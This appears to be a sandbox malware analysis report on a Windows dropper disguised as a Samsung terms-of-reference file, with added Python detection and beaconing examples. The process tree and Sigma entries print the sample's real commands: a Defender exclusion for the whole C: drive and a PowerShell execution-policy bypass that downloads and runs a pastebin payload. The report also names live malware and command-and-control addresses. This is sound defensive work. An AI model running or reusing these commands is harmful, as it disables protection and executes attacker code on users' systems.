
Windows Analysis Report
Terms_of_reference_06_01_2025_samsung.scr.exe

Overview

General Information

Sample name: Terms_of_reference_06_01_2025_samsung.scr.exe
Analysis ID: 1617329
MD5: c364bcdca858dbb480e269b7c0c0dedc
SHA1: 2251325091ef30f44e9bc716d995749a803f249e
SHA256: 0e6e34d9db771d5f81f2329150f9b71498feeca06dd764c59a0a4b43b16eed18
Tags: exe, WHKzW2nr, user-JAMESWT_MHT

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • Terms_of_reference_06_01_2025_samsung.scr.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe" MD5: C364BCDCA858DBB480E269B7C0C0DEDC)
    • powershell.exe (PID: 4084 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 3276 cmdline: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1972 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • csc.exe (PID: 7336 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
        • cvtres.exe (PID: 7408 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES792.tmp" "c:\Users\user\AppData\Local\Temp\xy2h0pkm\CSCB1F18608A6E140AA86CD9F6EC5A2C644.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • powershell.exe (PID: 7492 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
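The process tree above is the whole attack chain in three commands: the dropper spawns PowerShell to add a Defender exclusion for the entire C: drive, spawns a second PowerShell with the execution policy bypassed to fetch and run a pastebin raw paste, and that second stage compiles C# on the fly with csc.exe from the user's Temp directory. The following is an added example, not part of the Joe Sandbox report or any Sigma rule: the same three detections written as plain Python rules over process-creation events, run on a constructed event list transcribed from the tree (plus one benign csc.exe control), then correlated back to the root process so the chain is reported as one incident rather than four alerts. Field names (pid, ppid, image, cmdline) and the benign control event are assumptions of this example.

```python
"""Added example, not part of the Joe Sandbox report: the three process-creation
detections that fired on this sample (Defender exclusion via Add-MpPreference,
execution-policy bypass plus download-and-execute cradle, and csc.exe compiling
from a user-writable directory) as plain Python rules, run over a constructed
event list that mirrors the report's process tree and then correlated back to
the root process that spawned them all.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample input: PIDs, images and command lines are transcribed from the
# report's process tree; the last event is a benign control (a build from C:\src).
EVENTS = [
    ProcEvent(1988, 0, r"C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe",
              r'"C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe"'),
    ProcEvent(4084, 1988, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:'"),
    ProcEvent(3276, 1988, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'"powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"'),
    ProcEvent(7336, 3276, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline"'),
    ProcEvent(7492, 1988, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "\"powershell.exe\" Add-MpPreference -ExclusionPath 'C:'"),
    ProcEvent(9001, 9000, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /out:app.exe C:\src\app\Program.cs'),
]

DOWNLOAD = re.compile(r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# PowerShell accepts any unambiguous prefix of -ExecutionPolicy (-ep, -ex, -exec ...).
POLICY_BYPASS = re.compile(r"-e[xp][a-z]*\s+(bypass|unrestricted)", re.I)
MP_EXCLUSION = re.compile(r"\b(add|set)-mppreference\b.*-exclusion(path|process|extension)", re.I)
# Directories a standard user can write to; csc.exe reading its input from here is the signal.
USER_WRITABLE = re.compile(r"\\(appdata\\local\\temp|appdata\\roaming|users\\public|programdata|windows\\temp)\\", re.I)


def is_powershell(ev):
    return ev.image.lower().endswith(("\\powershell.exe", "\\pwsh.exe"))


def rule_defender_exclusion(ev):
    return is_powershell(ev) and MP_EXCLUSION.search(ev.cmdline) is not None


def rule_policy_bypass(ev):
    return is_powershell(ev) and POLICY_BYPASS.search(ev.cmdline) is not None


def rule_download_cradle(ev):
    # Both halves must be present: a download cmdlet and an execution cmdlet in one command line.
    return is_powershell(ev) and DOWNLOAD.search(ev.cmdline) is not None and EXECUTE.search(ev.cmdline) is not None


def rule_compile_from_user_dir(ev):
    return ev.image.lower().endswith(("\\csc.exe", "\\vbc.exe")) and USER_WRITABLE.search(ev.cmdline) is not None


RULES = {
    "defender_exclusion": rule_defender_exclusion,
    "execution_policy_bypass": rule_policy_bypass,
    "download_and_execute": rule_download_cradle,
    "compile_from_user_writable_dir": rule_compile_from_user_dir,
}


def evaluate(events):
    """Return {pid: [rule names that fired]} for every event that matched at least one rule."""
    hits = {}
    for ev in events:
        fired = [name for name, rule in RULES.items() if rule(ev)]
        if fired:
            hits[ev.pid] = fired
    return hits


def correlate_by_root(events, hits):
    """Walk each hit up its parent chain to the oldest ancestor present in the event
    set and collect the distinct rules under that root. One root accumulating several
    different rules is the pattern in this report: a dropper that first punches a
    Defender hole, then pulls and compiles a second stage."""
    by_pid = {ev.pid: ev for ev in events}
    roots = {}
    for pid, names in hits.items():
        cur = pid
        while by_pid[cur].ppid in by_pid:
            cur = by_pid[cur].ppid
        roots.setdefault(cur, set()).update(names)
    return roots


if __name__ == "__main__":
    found = evaluate(EVENTS)
    for pid, names in found.items():
        print(f"PID {pid}: {', '.join(names)}")
    for root, names in correlate_by_root(EVENTS, found).items():
        print(f"root PID {root} chained {len(names)} distinct detections: {sorted(names)}")
```

Run against the transcribed tree, the four PowerShell and csc.exe children each fire, and all of them collapse to root PID 1988; the benign build from C:\src fires nothing. On a host where the first rule has matched, the exclusion the sample added is visible in the ExclusionPath property of Get-MpPreference and can be removed with Remove-MpPreference -ExclusionPath 'C:'; an exclusion covering the whole system drive has no legitimate use and should be treated as confirmation, not a false positive.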

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4084, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", ProcessId: 7336, ProcessName: csc.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4084, ProcessName: powershell.exe
Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger; Data: Command: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ProcessId: 3276, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3276, TargetFilename: C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe", ParentImage: C:\Users\user\Desktop\Terms_of_reference_06_01_2025_samsung.scr.exe, ParentProcessId: 1988, ParentProcessName: Terms_of_reference_06_01_2025_samsung.scr.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath 'C:', ProcessId: 4084, ProcessName: powershell.exe

Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3276, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xy2h0pkm\xy2h0pkm.cmdline", ProcessId: 7336, ProcessName: csc.exe
Suricata IDS alerts

Timestamp                        SID      Severity  Classtype                Source IP    Src Port  Destination IP   Dst Port  Protocol
2025-02-17T18:57:28.713715+0100  2803305  3         Unknown Traffic          192.168.2.5  49714     172.67.74.152    80        TCP
2025-02-17T18:57:29.182389+0100  2803305  3         Unknown Traffic          192.168.2.5  49720     208.95.112.1     80        TCP
2025-02-17T18:57:32.313996+0100  2803305  3         Unknown Traffic          192.168.2.5  49726     149.154.167.220  443       TCP
2025-02-17T18:57:54.801700+0100  2803305  3         Unknown Traffic          192.168.2.5  60791     89.23.97.214     80        TCP
2025-02-17T18:57:54.802006+0100  2803305  3         Unknown Traffic          192.168.2.5  60792     89.23.97.214     80        TCP
2025-02-17T18:58:16.186836+0100  2803305  3         Unknown Traffic          192.168.2.5  59672     89.23.97.214     80        TCP
2025-02-17T18:58:16.191757+0100  2803305  3         Unknown Traffic          192.168.2.5  59671     89.23.97.214     80        TCP
2025-02-17T18:58:37.606294+0100  2803305  3         Unknown Traffic          192.168.2.5  59787     89.23.97.214     80        TCP
2025-02-17T18:58:37.609819+0100  2803305  3         Unknown Traffic          192.168.2.5  59786     89.23.97.214     80        TCP
2025-02-17T18:58:59.015165+0100  2803305  3         Unknown Traffic          192.168.2.5  59788     89.23.97.214     80        TCP
2025-02-17T18:58:59.030826+0100  2803305  3         Unknown Traffic          192.168.2.5  59789     89.23.97.214     80        TCP
2025-02-17T18:57:32.313996+0100  1810007  1         Potentially Bad Traffic  192.168.2.5  49726     149.154.167.220  443       TCP
2025-02-17T18:58:59.697743+0100  1810007  1         Potentially Bad Traffic  192.168.2.5  59791     149.154.167.220  443       TCP
2025-02-17T18:58:59.702364+0100  1810007  1         Potentially Bad Traffic  192.168.2.5  59790     149.154.167.220  443       TCP
2025-02-17T18:57:13.834460+0100  1810000  2         Potentially Bad Traffic  192.168.2.5  49704     172.67.19.24     443       TCP
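The alert timestamps carry a signal the per-flow Suricata rules do not express: the sample opens two connections to 89.23.97.214:80 roughly every 21 seconds for as long as the run lasts, which is a polling C2 loop rather than a one-off download. The following is an added example, not part of the Joe Sandbox report: beaconing detection over those alerts. It collapses connections that arrive within a second of each other into one check-in (the sample opens two sockets per poll), then flags any destination whose check-in intervals are regular. The alert tuples are transcribed from the report's tables and treated as constructed sample input; the thresholds (at least four check-ins, interval spread under 10% of the median, one-second burst window) are assumptions of this example, not values from the report.

```python
"""Added example, not from the Joe Sandbox report: beaconing detection over the
report's Suricata alert timestamps. Groups flows by destination, collapses
near-simultaneous connections into one check-in, and flags destinations whose
check-in intervals are regular."""
from datetime import datetime
from statistics import median

# Constructed sample input transcribed from the report's alert tables:
# (timestamp, SID, source port, destination IP, destination port).
# The sandbox client is 192.168.2.5 for every row.
ALERTS = [
    ("2025-02-17T18:57:13.834460+0100", 1810000, 49704, "172.67.19.24", 443),
    ("2025-02-17T18:57:28.713715+0100", 2803305, 49714, "172.67.74.152", 80),
    ("2025-02-17T18:57:29.182389+0100", 2803305, 49720, "208.95.112.1", 80),
    ("2025-02-17T18:57:32.313996+0100", 2803305, 49726, "149.154.167.220", 443),
    ("2025-02-17T18:57:54.801700+0100", 2803305, 60791, "89.23.97.214", 80),
    ("2025-02-17T18:57:54.802006+0100", 2803305, 60792, "89.23.97.214", 80),
    ("2025-02-17T18:58:16.186836+0100", 2803305, 59672, "89.23.97.214", 80),
    ("2025-02-17T18:58:16.191757+0100", 2803305, 59671, "89.23.97.214", 80),
    ("2025-02-17T18:58:37.606294+0100", 2803305, 59787, "89.23.97.214", 80),
    ("2025-02-17T18:58:37.609819+0100", 2803305, 59786, "89.23.97.214", 80),
    ("2025-02-17T18:58:59.015165+0100", 2803305, 59788, "89.23.97.214", 80),
    ("2025-02-17T18:58:59.030826+0100", 2803305, 59789, "89.23.97.214", 80),
    ("2025-02-17T18:58:59.697743+0100", 1810007, 59791, "149.154.167.220", 443),
    ("2025-02-17T18:58:59.702364+0100", 1810007, 59790, "149.154.167.220", 443),
]


def parse_ts(ts):
    # Suricata/Joe timestamps use a +HHMM offset, which strptime's %z accepts.
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def checkins_by_destination(alerts, burst_gap=1.0):
    """Map (dst_ip, dst_port) -> sorted list of check-in times as epoch seconds.
    A connection within burst_gap seconds of the previous one to the same
    destination is part of the same check-in, not a new one."""
    flows = {}
    for ts, _sid, _sport, dst, dport in alerts:
        flows.setdefault((dst, dport), []).append(parse_ts(ts).timestamp())
    result = {}
    for key, times in flows.items():
        times.sort()
        bursts, prev = [times[0]], times[0]
        for t in times[1:]:
            if t - prev > burst_gap:
                bursts.append(t)
            prev = t
        result[key] = bursts
    return result


def find_beacons(alerts, min_checkins=4, max_jitter=0.1, burst_gap=1.0):
    """Return destinations whose check-in intervals are regular: at least
    min_checkins check-ins and (max - min) / median interval at most max_jitter.
    Assumed thresholds; tune them to the sleep/jitter the implant actually uses."""
    beacons = {}
    for key, bursts in checkins_by_destination(alerts, burst_gap).items():
        if len(bursts) < min_checkins:
            continue
        gaps = [b - a for a, b in zip(bursts, bursts[1:])]
        period = median(gaps)
        jitter = (max(gaps) - min(gaps)) / period
        if jitter <= max_jitter:
            beacons[key] = {"checkins": len(bursts), "period_s": round(period, 2), "jitter": round(jitter, 4)}
    return beacons


if __name__ == "__main__":
    for (ip, port), info in find_beacons(ALERTS).items():
        print(f"{ip}:{port} beacons every ~{info['period_s']}s ({info['checkins']} check-ins, jitter {info['jitter']})")
```

On this data only 89.23.97.214:80 qualifies, with four check-ins about 21.4 seconds apart and almost no jitter; the Telegram API endpoint (149.154.167.220:443) is contacted twice and never reaches the minimum count, which is the expected false-negative trade-off for a short sandbox run. The same host also serves http://89.23.97.214/TeamBuild/win32_svchost.exe, which the Avira URL Cloud entry below labels as malware, so the beacon and the payload URL corroborate each other.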


AV Detection

Source: http://89.23.97.214/TeamBuild/win32_svchost.exe; Avira URL Cloud: Label: malware
Source: Terms_of_reference_06_01_2025_samsung.scr.exe; ReversingLabs: Detection: 59%
Source: Terms_of_reference_06_01_2025_samsung.scr.exe; Virustotal: Detection: 55%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
Source: unknown; HTTPS traffic detected: 172.67.19.24:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: Terms_of_reference_06_01_2025_samsung.scr.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168130282.000002980C590000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3168102003.000002980C581000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Xml.ReaderWriter\Release\net8.0\System.Xml.ReaderWriter.pdbSHA256I source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165424131.000002980BAD0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160601511.00000298087F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3165031754.000002980BA61000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164868495.000002980BA20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Concurrent.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164131315.000002980B850000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3164058288.000002980B831000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167376562.000002980C121000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3166893087.000002980BE20000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.FileSystem.DriveInfo\Release\net8.0-windows\System.IO.FileSystem.DriveInfo.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160308073.00000298086B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3160289396.00000298086A1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Diagnostics.Process.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159537261.00000257739B1000.00000020.00001000.00020000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159402983.0000025773960000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.ComponentModel.Primitives.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159462177.0000025773990000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159341485.0000025773951000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Private.Uri.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163977952.000002980B810000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3163418543.000002980B6F1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3167936851.000002980C4B0000.00000004.10000000.00040000.00000000.sdmp, Terms_of_reference_06_01_2025_samsung.scr.exe, 00000000.00000002.3159001590.0000025772101000.00000020.00001000.00020000.00000000.sdmp
